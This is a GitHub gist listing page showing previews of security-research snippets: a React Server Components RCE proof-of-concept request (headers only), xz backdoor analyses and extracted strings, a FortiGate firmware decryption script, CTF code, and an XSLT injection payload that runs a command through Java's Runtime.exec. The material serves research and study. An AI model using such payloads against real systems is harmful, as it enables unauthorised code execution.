Skip to content

Instantly share code, notes, and snippets.

View WinMin's full-sized avatar
🤣
Read the fucking source code

swing WinMin

🤣
Read the fucking source code
1k followers · 183 following
View GitHub Profile
@maple3142
maple3142 / CVE-2025-55182.http
Last active January 5, 2026 05:03
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@smx-smx
smx-smx / XZ Backdoor Analysis
Last active December 18, 2025 02:06
[WIP] XZ Backdoor Analysis and symbol mapping
XZ Backdoor symbol deobfuscation. Updated as i make progress
@q3k
q3k / hashes.txt
Last active October 21, 2025 14:24
liblzma backdoor strings extracted from 5.6.1 (from a built-in trie)
0810 b' from '
0678 b' ssh2'
00d8 b'%.48s:%.48s():%d (pid=%ld)\x00'
0708 b'%s'
0108 b'/usr/sbin/sshd\x00'
0870 b'Accepted password for '
01a0 b'Accepted publickey for '
0c40 b'BN_bin2bn\x00'
06d0 b'BN_bn2bin\x00'
0958 b'BN_dup\x00'
@thesamesam
thesamesam / xz-backdoor.md
Last active January 9, 2026 08:45
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Update: I've disabled comments as of 2025-01-26 to avoid everyone having notifications for something a year on if someone wants to suggest a correction. Folks are free to email to suggest corrections still, of course.

Background

@rrrrrrri
rrrrrrri / fgt_7.4.x_rootfs_decrypt.py
Created March 15, 2024 01:26
fgt_7.4.x_rootfs_decrypt
import magic
import r2pipe
import hashlib
import argparse
import subprocess
from unicorn import *
from unicorn.x86_const import *
# from udbserver import * # uncomment this line if you want to debug
def pad_size(size):
@NyaMisty
NyaMisty / GhidraIDA.md
Last active July 16, 2025 11:38
Misty's Ghidra IDA like experience

How to Use

  1. In Ghidra's Project Tool, Go to Tools -> Import Tool..., select mistyCodeBrowser.tool
  2. Dragging file onto the new CodeBrowser_1 in ToolChest
@thanatoskira
thanatoskira / select.xslt
Last active August 7, 2025 04:23
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@WinMin
WinMin / theme.css
Created March 4, 2022 06:01 — forked from fatalbit/theme.css
IDA Monokai Color Palette
/* INSTALL:
*
* Put this file under the respective directory.
* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
* Linux & MacOS: ~/.idapro/themes/monokai/theme.css
*
* In Options -> Colors change theme to monokai
*
* */
@importtheme "dark";
@sampritipanda
sampritipanda / black_box.c
Last active January 25, 2022 04:27
Real World CTF 2022 - Black Box
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/in.h>
#include <linux/slab.h>
#include <linux/delay.h>
#include <linux/string.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("sampriti");
MODULE_DESCRIPTION("qemu cve");
@marcan
marcan / m1racles-poc.c
Last active December 21, 2024 02:39
/*
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
*
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
*
* Please visit m1racles.com for more information.
*
* Licensed under the MIT license.
*/